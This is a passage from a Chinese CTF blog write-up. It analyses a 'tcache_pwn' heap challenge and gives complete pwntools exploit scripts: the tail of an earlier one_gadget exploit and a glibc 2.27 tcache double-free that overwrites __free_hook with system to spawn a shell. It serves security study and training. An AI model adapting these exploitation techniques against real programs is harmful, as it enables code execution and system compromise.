+ <span class="string">'\x00\x00'</span>) - <span class="number">216</span> - <span class="number">0X3C4B20</span></span><br><span class="line">print(<span class="string">"libc base: "</span> + hex(libc_base))</span><br><span class="line">onr_gadget = libc_base + <span class="number">0x45216</span></span><br><span class="line">p.sendlineafter(<span class="string">"chioce&gt;"</span>, <span class="string">'4'</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"&gt;"</span>, <span class="string">'2'</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"index\n"</span>, <span class="string">'0'</span>)</span><br><span class="line">payload = <span class="string">'a'</span> * <span class="number">0x28</span> + p64(<span class="number">0x0602160</span>) * <span class="number">2</span> + p64(onr_gadget) <span class="comment">#这里要注意他会以rbp-4的地址里面的内容为地址取值，所以要保证可读</span></span><br><span class="line">p.sendlineafter(<span class="string">"&gt;"</span>, payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="tcache-pwn"><a href="#tcache-pwn" class="headerlink" title="tcache_pwn"></a>tcache_pwn</h2><h3 id="题目分析-3"><a href="#题目分析-3" class="headerlink" title="题目分析"></a>题目分析</h3><p>从名字可以得知是和tcache机制有关的，忘记当时的libc了，应该是2.26/2.27的吧，这里就用2.27的版本来做题</p>
<blockquote>
<ol>
<li>add flag</li>
<li>check flag</li>
<li>delete flag</li>
<li>exit</li>
</ol>
</blockquote>
<p>四个常规功能</p>
<p>add函数没有什么特别的</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> __<span class="function">int64 <span class="title">add</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> lenth; <span class="comment">// [rsp+Ch] [rbp-14h]</span></span><br><span class="line">  <span class="keyword">void</span> *buf; <span class="comment">// [rsp+10h] [rbp-10h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v3; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v3 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="keyword">if</span> ( flag_count &lt;= <span class="number">9</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"input your flag's length"</span>);</span><br><span class="line">    __isoc99_scanf(<span class="string">"%d"</span>, &amp;lenth);</span><br><span class="line">    buf = <span class="built_in">malloc</span>(lenth);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"input your flag"</span>);</span><br><span class="line">    read(<span class="number">0</span>, buf, lenth);</span><br><span class="line">    flag_list[flag_count++] = buf;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"adding ok"</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"flags are too many"</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v3;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>check函数也一样</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> __<span class="function">int64 <span class="title">check</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> index; <span class="comment">// [rsp+4h] [rbp-Ch]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v2; <span class="comment">// [rsp+8h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v2 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  index = <span class="number">0</span>;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"input your index"</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">"%d"</span>, &amp;index);</span><br><span class="line">  <span class="keyword">if</span> ( index &lt; flag_count )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>((<span class="keyword">const</span> <span class="keyword">char</span> *)flag_list[index]);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"ok"</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"idx &gt; num"</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v2;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>而在delete函数里面，存在uaf，可以多次释放</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> __<span class="function">int64 <span class="title">delete</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> index; <span class="comment">// [rsp+4h] [rbp-Ch]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v2; <span class="comment">// [rsp+8h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v2 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  index = <span class="number">0</span>;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"input your index"</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">"%d"</span>, &amp;index);</span><br><span class="line">  <span class="keyword">if</span> ( index &lt; flag_count )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">free</span>((<span class="keyword">void</span> *)flag_list[index]);             <span class="comment">// use after free</span></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"ok"</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"idx &gt; num"</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v2;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>在2.26/2.27的libc中，tcache验证没有那么严格，tcache对于chunk的free，并不会像fastbin那样检查是否已在bin中，所以在这两个版本的libc中可以直接free两个chunk，形成tcache double free（在2.28版本以上已经增加了double free的check，会遍历整个链，如何绕过？）</p>
<p>double free后再malloc一次，并且修改自己的next指针为目标地址，则在tcache中会形成当前chunk-&gt;目标地址的伪链，我们再malloc两次，就得到了目标地址的读写权，而且tcache不会对目标地址有size的限制，也就是说我们可以指向任何地方，这里我们修改free_got为system，再free一个带有/bin/sh的chunk就可getshell</p>
<p>libc基址还是利用unsortedbin来泄漏，在tcache中，要free一个大于tcache范围（0x440？）的chunk才会放入unsortedbin，这里我们用一个0x500的chunk即可，然后再malloc一个0x10的chunk，填充8个字符拼接起bk位置的libc main arena指针，将其泄漏</p>
<h3 id="EXP-3"><a href="#EXP-3" class="headerlink" title="EXP"></a>EXP</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># glibc-2.27</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">"./tcache_pwn"</span>)</span><br><span class="line">libc = ELF(<span class="string">"/libc-2.27.so"</span>)</span><br><span class="line"></span><br><span class="line">get = <span class="keyword">lambda</span> data: u64(data + <span class="string">'\x00\x00'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(sz, ctn=<span class="string">'1'</span>)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">"choice&gt;\n"</span>, <span class="string">'1'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">"length\n"</span>, str(sz))</span><br><span class="line">    p.sendlineafter(<span class="string">"flag\n"</span>, ctn)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">check</span><span class="params">(idx)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">"choice&gt;\n"</span>, <span class="string">'2'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">"index\n"</span>, str(idx))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(idx)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">"choice&gt;\n"</span>, <span class="string">'3'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">"index\n"</span>, str(idx))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x500</span>)</span><br><span class="line">add(<span class="number">0x10</span>, <span class="string">'/bin/sh\x00'</span>)</span><br><span class="line">add(<span class="number">0x10</span>)</span><br><span class="line">add(<span class="number">0x10</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">check(<span class="number">0</span>)</span><br><span class="line">main_arena = get(p.recv(<span class="number">6</span>)) - <span class="number">96</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">"main arena: "</span> + hex(main_arena)</span><br><span class="line">libc_base = main_arena - <span class="number">0x3EBC40</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">"libc base: "</span> + hex(libc_base)</span><br><span class="line">free_hook = libc_base + libc.symbols[<span class="string">'__free_hook'</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">"free hook: "</span> + hex(free_hook)</span><br><span class="line">libc_system = libc_base + libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">add(<span class="number">0x10</span>, p64(free_hook))</span><br><span class="line">add(<span class="number">0x10</span>)</span><br><span class="line">add(<span class="number">0x10</span>, p64(libc_system))</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

        </div>
        
        <div class="level is-size-7 is-uppercase">
            <div class="level-start">
                <div class="level-item">
                    <span class="is-size-6 has-text-grey has-mr-7">#</span>
                    <a class="has-link-grey -link" href="/tags/libc/">libc</a>, <a class="has-link-grey -link" href="/tags/pwn/">pwn</a>, <a class="has-link-grey -link" href="/tags/stack/">stack</a>
                </div>
            </div>
        </div>
        
        
        
    </div>
</div>





<div class="card card-transparent">
    <div class="level post-navigation is-flex-wrap is-mobile">
        
        <div class="level-start">
            <a class="level level-item has-link-grey  article-nav-prev" href="/2019/08/06/XMan-Training-WP.html">
                <i class="level-item fas fa-chevron-left"></i>
                <span class="level-item">XMan-Training-WP</span>
            </a>
        </div>
        
        
        <div class="level-end">
            <a class="level level-item has-link-grey  article-nav-next" href="/2019/04/27/2019NUSTCTF-fmt.html">
                <span class="level-item">2019 NUSTCTF fmt</span>
                <i class="level-item fas fa-chevron-right"></i>
            </a>
        </div>
        
    </div>
</div>


</div>
                




<div class="column is-4-tablet is-4-desktop is-3-widescreen  has-order-1 column-left is-sticky">
    
        
    
        
<div class="card widget">
    <div class="card-content">
        <nav class="level">
            <div class="level-item has-text-centered" style="flex-shrink: 1">
                <div>
                    
                    <figure class="image is-128x128 has-mb-6">
                        <img class="" src="/images/avatar.png" alt="Mask">
                    </figure>
                    
                    <p class="is-size-4 is-block">
                        Mask
                    </p>
                    
                    
                    <p class="is-size-6 is-block">
                        A newbie in CTF
                    </p>
                    
                    
                </div>
            </div>
        </nav>
        <nav class="level is-mobile">
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        文章
                    </p>
                    <a href="/archives">
                        <p class="title has-text-weight-normal">
                            14
                        </p>
                    </a>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        分类
                    </p>
                    <a href="/categories">
                        <p class="title has-text-weight-normal">
                            4
                        </p>
                    </a>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        标签
                    </p>
                    <a href="/tags">
                        <p class="title has-text-weight-normal">
                            13
                        </p>
                    </a>
                </div>
            </div>
        </nav>
        
        
        
        <div class="level is-mobile">
            
            <a class="level-item button is-white is-marginless" target="_blank" rel="noopener"
                title="Github" href="https://github.com/mask6asok">
                
                <i class="fab fa-github"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank" rel="noopener"
                title="QQ" href="tencent://message/?uin=1924594189&amp;Site=&amp;menu=yes">
                
                <i class="fab fa-qq"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank" rel="noopener"
                title="Email" href="mailto:1924594189@qq.com">
                
                <i class="fa fa-envelope"></i>
                
            </a>
            
        </div>
        
    </div>
</div>
    
        <div class="card widget">
    <div class="card-content">
        <div class="menu">
        <h3 class="menu-label">
            链接
        </h3>
        <ul class="menu-list">
        
            <li>
                <a class="level is-mobile" href="https://binlep.github.io/" target="_blank" rel="noopener">
                    <span class="level-left">
                        <span class="level-item">binLep&#39;s blog</span>
                    </span>
                    <span class="level-right">
                        <span class="level-item tag">binlep.github.io</span>
                    </span>
                </a>
            </li>
        
        </ul>
        </div>
    </div>
</div>

    
    
        <div class="column-right-shadow is-hidden-widescreen is-sticky">
        
            
<div class="card widget">
    <div class="card-content">
        <div class="menu">
            <h3 class="menu-label">
                分类
            </h3>
            <ul class="menu-list">
            <li>
        <a class="level is-marginless" href="/categories/Crypto/">
            <span class="level-start">
                <span class="level-item">Crypto</span>
            </span>
            <span class="level-end">
                <span class="level-item tag">1</span>
            </span>
        </a></li><li>
        <a class="level is-marginless" href="/categories/DBMS/">
            <span class="level-start">
                <span class="level-item">DBMS</span>
            </span>
            <span class="level-end">
                <span class="level-item tag">1</span>
            </span>
        </a></li><li>
        <a class="level is-marginless" href="/categories/Others/">
            <span class="level-start">
                <span class="level-item">Others</span>
            </span>
            <span class="level-end">
                <span class="level-item tag">1</span>
            </span>
        </a></li><li>
        <a class="level is-marginless" href="/categories/Pwn/">
            <span class="level-start">
                <span class="level-item">Pwn</span>
            </span>
            <span class="level-end">
                <span class="level-item tag">9</span>
            </span>
        </a></li>
            </ul>
        </div>
    </div>
</div>
        
            <div class="card widget">
    <div class="card-content">
        <div class="menu">
            <h3 class="menu-label">
                标签
            </h3>
            <div class="field is-grouped is-grouped-multiline">
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/Conditional-competition/">
                        <span class="tag">Conditional competition</span>
                        <span class="tag is-grey">1</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/IOFILE/">
                        <span class="tag">IOFILE</span>
                        <span class="tag is-grey">1</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/arm/">
                        <span class="tag">arm</span>
                        <span class="tag is-grey">1</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/fmt/">
                        <span class="tag">fmt</span>
                        <span class="tag is-grey">2</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/format/">
                        <span class="tag">format</span>
                        <span class="tag is-grey">1</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/heap/">
                        <span class="tag">heap</span>
                        <span class="tag is-grey">4</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/integer-overflow/">
                        <span class="tag">integer overflow</span>
                        <span class="tag is-grey">1</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/kernel/">
                        <span class="tag">kernel</span>
                        <span class="tag is-grey">1</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/libc/">
                        <span class="tag">libc</span>
                        <span class="tag is-grey">2</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/pwn/">
                        <span class="tag">pwn</span>
                        <span class="tag is-grey">5</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/shellcode/">
                        <span class="tag">shellcode</span>
                        <span class="tag is-grey">1</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/stack/">
                        <span class="tag">stack</span>
                        <span class="tag is-grey">2</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/tcache/">
                        <span class="tag">tcache</span>
                        <span class="tag is-grey">2</span>
                    </a>
                </div>
                
            </div>
        </div>
    </div>
</div>
        
        </div>
    
</div>

                




<div class="column is-4-tablet is-4-desktop is-3-widescreen is-hidden-touch is-hidden-desktop-only has-order-3 column-right is-sticky">
    
        
<div class="card widget">
    <div class="card-content">
        <div class="menu">
            <h3 class="menu-label">
                分类
            </h3>
            <ul class="menu-list">
            <li>
        <a class="level is-marginless" href="/categories/Crypto/">
            <span class="level-start">
                <span class="level-item">Crypto</span>
            </span>
            <span class="level-end">
                <span class="level-item tag">1</span>
            </span>
        </a></li><li>
        <a class="level is-marginless" href="/categories/DBMS/">
            <span class="level-start">
                <span class="level-item">DBMS</span>
            </span>
            <span class="level-end">
                <span class="level-item tag">1</span>
            </span>
        </a></li><li>
        <a class="level is-marginless" href="/categories/Others/">
            <span class="level-start">
                <span class="level-item">Others</span>
            </span>
            <span class="level-end">
                <span class="level-item tag">1</span>
            </span>
        </a></li><li>
        <a class="level is-marginless" href="/categories/Pwn/">
            <span class="level-start">
                <span class="level-item">Pwn</span>
            </span>
            <span class="level-end">
                <span class="level-item tag">9</span>
            </span>
        </a></li>
            </ul>
        </div>
    </div>
</div>
    
        <div class="card widget">
    <div class="card-content">
        <div class="menu">
            <h3 class="menu-label">
                标签
            </h3>
            <div class="field is-grouped is-grouped-multiline">
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/Conditional-competition/">
                        <span class="tag">Conditional competition</span>
                        <span class="tag is-grey">1</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/IOFILE/">
                        <span class="tag">IOFILE</span>
                        <span class="tag is-grey">1</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/arm/">
                        <span class="tag">arm</span>
                        <span class="tag is-grey">1</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/fmt/">
                        <span class="tag">fmt</span>
                        <span class="tag is-grey">2</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/format/">
                        <span class="tag">format</span>
                        <span class="tag is-grey">1</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/heap/">
                        <span class="tag">heap</span>
                        <span class="tag is-grey">4</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/integer-overflow/">
                        <span class="tag">integer overflow</span>
                        <span class="tag is-grey">1</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/kernel/">
                        <span class="tag">kernel</span>
                        <span class="tag is-grey">1</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/libc/">
                        <span class="tag">libc</span>
                        <span class="tag is-grey">2</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/pwn/">
                        <span class="tag">pwn</span>
                        <span class="tag is-grey">5</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/shellcode/">
                        <span class="tag">shellcode</span>
                        <span class="tag is-grey">1</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/stack/">
                        <span class="tag">stack</span>
                        <span class="tag is-grey">2</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/tcache/">
                        <span class="tag">tcache</span>
                        <span class="tag is-grey">2</span>
                    </a>
                </div>
                
            </div>
        </div>
    </div>
</div>
    
    
</div>

            </div>
        </div>
    </section>
    <footer class="footer">
    <div class="container">
        <div class="level">
            <div class="level-start has-text-centered-mobile">
                <a class="footer-logo is-block has-mb-6" href="/">
                
                    <img src="/images/logo.ico" alt="2019 SUSCTF PWN" height="28">
                
                </a>
                <p class="is-size-7">
                &copy; 2020 Mask&nbsp;
                Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> & <a
                        href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a>
                
                </p>
            </div>
            <div class="level-end">
            
            </div>
        </div>
    </div>
</footer>
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script>
<script>moment.locale("zh-CN");</script>


<script>
var IcarusThemeSettings = {
    site: {
        url: 'Mask6asok.github.io',
        external_link: {"enable":true,"exclude":[]}
    },
    article: {
        highlight: {
            clipboard: false,
            fold: ''
        }
    }
};
</script>






<script src="/js/animation.js"></script>



<script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script>
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script>
<script src="/js/gallery.js" defer></script>



<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update
            my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.js" defer></script>
<script>
    document.addEventListener("DOMContentLoaded", function () {
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        });
    });
</script>


<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    MathJax.Hub.Config({
        'HTML-CSS': {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
});
</script>


<a id="back-to-top" title="回到顶端" href="javascript:;">
    <i class="fas fa-chevron-up"></i>
</a>
<script src="/js/back-to-top.js" defer></script>














<script src="/js/main.js" defer></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="想要查找什么..." />
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: '文章',
                PAGES: '页面',
                CATEGORIES: '分类',
                TAGS: '标签',
                UNTITLED: '(无标题)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js" defer></script>
<link rel="stylesheet" href="/css/search.css">
<link rel="stylesheet" href="/css/insight.css">
    
</body>
</html>